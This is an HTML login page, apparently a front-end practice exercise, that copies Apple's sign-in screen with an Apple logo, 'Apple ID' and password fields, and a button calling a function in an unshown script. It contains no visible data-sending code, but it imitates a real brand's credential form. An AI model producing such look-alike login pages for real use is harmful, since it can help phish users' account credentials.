<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <link rel="stylesheet" type="text/css" href="登录.css">
</head>
<body>
    <div class="container">
        <div class="login-box">
            <div class="login-header">
                <img src="../img/3.jpg" alt="Apple Logo" class="logo">
                <h1>Sign In</h1>
            </div>
            <div class="login-form">
                <label for="input1">Apple ID</label>
                <input type="text" id="input1" placeholder="请输入输入用户名">
                
                <label for="input2">Password</label>
                <input type="password" id="input2" placeholder="请输入密码">
                
                <button onclick="sum()">Sign In</button>
            </div>
            <!-- <div class="login-footer">
                <a href="注册.html">Forgot Apple ID or password?</a>
            </div> -->
        </div>
    </div>
    <script src="登录.js"></script> 
</body>
</html>
